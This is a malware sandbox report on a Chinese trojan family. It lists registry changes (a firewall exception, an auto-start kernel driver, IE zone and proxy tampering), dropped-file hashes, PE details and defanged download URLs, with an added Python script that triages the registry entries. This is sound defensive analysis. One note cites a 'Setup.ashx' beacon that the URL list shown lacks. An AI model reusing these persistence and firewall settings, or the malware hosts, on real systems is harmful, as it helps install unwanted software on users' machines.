[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 AE 46 36 24 60 B5 26 DD 0F 6F BD B3 1B E2 A6"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

Adds a rule to the Windows firewall which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Wuji]
"Wuji.exe" = "%Program Files%\Wuji\Wuji.exe:*:Enabled:WJ"

The process netsh.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 44 67 5F 5E 3E AE 95 10 EB DA BE 33 C1 CB 2B"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

Adds a rule to the Windows firewall which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Wuji]
"update.exe" = "%Program Files%\Wuji\update.exe:*:Enabled:WJU"

The process SportLive.exe:908 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\sougop]
"HDiskNum" = "00000000000000000001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\System\CurrentControlSet\Services\sougop]
"Type" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Services\sougop]
"ErrorControl" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "SportLive.exe"

[HKLM\System\CurrentControlSet\Services\sougop]
"StFlag" = "200"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\sougop]
"ImagePath" = "\??\%Program Files%\TogouInputin\Togoupplib.dat"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1400392493"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 73 BA 77 D6 3D E1 C8 87 D6 84 32 D0 33 6F 0A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\sougop]
"qid" = "165"
"InstFlag" = "1"
"DisplayName" = "Togoupplib"

The Trojan modifies the IE security-zone map so that network paths (UNCs) are treated as Local intranet sites:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone map so that sites which bypass the proxy server are treated as Local intranet sites:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies the IE security-zone map so that local (dotless) site names not listed in another zone are treated as Local intranet sites:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The following service is registered to start automatically at boot (Start = 2, SERVICE_AUTO_START). Together with Type = 1 (SERVICE_KERNEL_DRIVER) and the ImagePath set above, this loads %Program Files%\TogouInputin\Togoupplib.dat as a kernel-mode driver under the display name "Togoupplib"; note that the driver image is a .dat file under a directory named like an input-method product rather than a .sys under System32\drivers. The non-standard values under the same key are the component's own configuration: HDiskNum holds the string that the Setup.ashx beacon in the URL list sends as physn=, and qid = 165 matches the xxdd_165.exe download in the URL list.

[HKLM\System\CurrentControlSet\Services\sougop]
"Start" = "2"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The ZoneMap flags, MigrateProxy = 1, ProxyEnable = 0 and these three deletions are also what WinInet typically writes when it initialises a user's Internet Settings for the first time, so on their own they are weak evidence of intent; the sougop driver service is the stronger indicator in this section.

The process MsiExec.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 37 FA 3B 16 EA 71 14 EB 9A 16 E8 A9 6A C9 BF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F FB DB 99 98 F2 8C E4 0F 5A DC 54 52 63 F7 18"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies the IE security-zone map so that network paths (UNCs) are treated as Local intranet sites:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone map so that sites which bypass the proxy server are treated as Local intranet sites:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies the IE security-zone map so that local (dotless) site names not listed in another zone are treated as Local intranet sites:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process oemfhsli.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\FhRl]
"Path" = "%Program Files%\fhrl"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\FhRl]
"Exit" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\fhrl]
"FhCalendar.exe" = "TODO: <文件说明>"

(The cached FileDescription is the unedited placeholder from the Chinese Visual Studio resource template, "TODO: <File description>" in English; a version resource left in this state is a convenient hunting string for FhCalendar.exe builds.)

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 16 2C 5F 74 64 B4 AC E0 3E CF 48 61 45 D7 F5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies the IE security-zone map so that network paths (UNCs) are treated as Local intranet sites:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone map so that sites which bypass the proxy server are treated as Local intranet sites:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies the IE security-zone map so that local (dotless) site names not listed in another zone are treated as Local intranet sites:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

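The registry listings above repeat the same three patterns for each process (the sougop service registration, the ZoneMap flags and the proxy-value deletions) in a regular `[key]` / `"name" = "value"` layout that is easy to triage mechanically. The Python below is an added example written for this page, not part of the Lavasoft report or of the sample's own code: it parses that layout and applies three rules (a service or driver registered to start, ZoneMap flags set to 1, proxy disabled together with deleted proxy values). The sample text is constructed from the entries above; the rule wording and thresholds are the editor's own.

```python
"""Parse the registry-change listing of a Lavasoft-style sandbox report and
flag the persistence and Internet Explorer zone/proxy tampering it records.
Added example, not part of the original report: SAMPLE is constructed from
the entries the report lists, and the three rules are the editor's own."""
import re
from collections import defaultdict

KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"\s*=\s*"(?P<value>.*)"$')
DELETED_RE = re.compile(r'^"(?P<name>[^"]+)"$')  # bare name under a "deletes" list
SERVICE_RE = re.compile(r'\\Services\\(?P<svc>[^\\]+)$', re.IGNORECASE)
# Win32 SERVICE_* encodings of a service's Start and Type values.
START_NAMES = {"0": "BOOT_START", "1": "SYSTEM_START", "2": "AUTO_START",
               "3": "DEMAND_START", "4": "DISABLED"}
DRIVER_TYPES = {"1": "KERNEL_DRIVER", "2": "FILE_SYSTEM_DRIVER"}
ZONEMAP_FLAGS = ("IntranetName", "ProxyBypass", "UNCAsIntranet")


def parse_registry_dump(text):
    """Return ({key: {name: value}}, {key: {deleted names}}).
    Keys that repeat through the report are merged, and a value line with no
    new [key] header above it belongs to the most recent key, which is how the
    report lays out e.g. "Cookies" under Shell Folders. Narrative lines are skipped."""
    sets, deletes = defaultdict(dict), defaultdict(set)
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group("key")
            continue
        if key is None:
            continue
        m = VALUE_RE.match(line)
        if m:
            sets[key][m.group("name")] = m.group("value")
            continue
        m = DELETED_RE.match(line)
        if m:
            deletes[key].add(m.group("name"))
    return dict(sets), dict(deletes)


def triage(sets, deletes):
    """Apply three rules and return one finding string per hit, in key order."""
    findings = []
    for key, values in sets.items():
        low = key.lower()
        svc = SERVICE_RE.search(key)
        if svc and "Start" in values:  # a service or driver registered to start
            kind = DRIVER_TYPES.get(values.get("Type", ""), "service")
            start = START_NAMES.get(values["Start"], values["Start"])
            findings.append(f"persistence: {kind} '{svc.group('svc')}' Start={start} "
                            f"ImagePath={values.get('ImagePath', '?')}")
        if low.endswith(r"\internet settings\zonemap"):
            on = [n for n in ZONEMAP_FLAGS if values.get(n) == "1"]
            if on:
                findings.append("ie zone tampering: " + ", ".join(on) + " set to 1")
        if low.endswith(r"\internet settings") and values.get("ProxyEnable") == "0":
            gone = sorted(deletes.get(key, ()))
            findings.append("proxy disabled" + (", deleted " + ", ".join(gone) if gone else ""))
    return findings


# Constructed from the report's own entries (same keys, values and layout).
SAMPLE = r"""
[HKLM\System\CurrentControlSet\Services\sougop]
"Type" = "1"

[HKLM\System\CurrentControlSet\Services\sougop]
"ImagePath" = "\??\%Program Files%\TogouInputin\Togoupplib.dat"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

"ProxyBypass" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

[HKLM\System\CurrentControlSet\Services\sougop]
"Start" = "2"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"""


def example_findings():
    """Triage the constructed sample and return the finding strings."""
    return triage(*parse_registry_dump(SAMPLE))
```

`example_findings()` returns three findings for the sample: the sougop kernel driver set to AUTO_START with its Togoupplib.dat image, the three ZoneMap flags, and the disabled proxy with its three deleted values. On the full listing the proxy rule also fires on the Hardware Profiles\0001 Internet Settings key, and the ZoneMap and proxy findings should be weighted down because WinInet first-run initialisation writes the same cluster; the driver finding is the one that matters.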
Dropped PE files

MD5 File path
4fd79c74d5e8ccc8b11a1d7bc1a0ef94 c:\Documents and Settings\All Users\Documents\fhrl_6_12001.exe
e1bc857849dcf7a928dbf96dd364060f c:\Program Files\Common Files\Install\fhrlsli\oemfhsli.exe
da61211302dbc86ced4738aff7c7868b c:\Program Files\fhrl\DuiLib_u.dll
911d9454d22938b77368a6da6c413313 c:\Program Files\fhrl\FMDLL.dll
1854bd1de533fd48ece92216fce57ea6 c:\Program Files\fhrl\FMDLL32.dll
ad962279c742cb5f2e32640d160e246c c:\Program Files\fhrl\FMTest.exe
97fea0e5059a5bde0cd59a3294ff3bde c:\Program Files\fhrl\FhCalendar.exe
a570c326ab7a433647c95b4a4669525b c:\Program Files\fhrl\Fhuninstall.exe
8d2cdf0a3c544db534735c8e83842cce c:\Program Files\fhrl\KillProc.exe
4e06c6f59cf9204c435cfa22a7abb669 c:\Program Files\fhrl\Skin\Default\foembin.exe
81a05de047701a946d8a441ffd08aa1a c:\Program Files\fhrl\Update.exe
7c9de379baab0801961a73377a379f14 c:\Program Files\fhrl\uninst.exe
349bf98a0025a50bf8e82158a62faeaa c:\fhsli_6_12001.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United States)

(The question marks are Chinese strings that did not survive extraction and cannot be recovered from this page. The Comments field points to eyuyan.com, the site of the Easy Language (易语言) development environment; executables built with it are what vendors label FlyStudio, which is where the family name in the detection list comes from.)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 425984 201728 5.54424 d0ef0aaee25bba1be37747cce181dfcf
.rdata 430080 69632 17920 5.50197 2c2e8d17d10be6f7aa7ca9f9876e0a99
.data 499712 176128 17920 5.51743 4b67851f67928e82417856798afacf3a
.rsrc 675840 790528 246272 5.53726 981a356a8a9ce2514af7897a72a377f8
.aspack 1466368 12288 9728 3.47169 263888398d77ec23c33d8b15fd5d106b
.adata 1478656 4096 0 0 d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://software.fhrlw.cn/slience/fhsli_6_12001.exe 61.147.103.147
hxxp://software.fhrlw.cn/oemini/info.ini?id=41 61.147.103.147
hxxp://s-99273.abc188.com/xxdd_165.exe
hxxp://software.fhrlw.cn/fhrl/fhrl_0613.exe 61.147.103.147
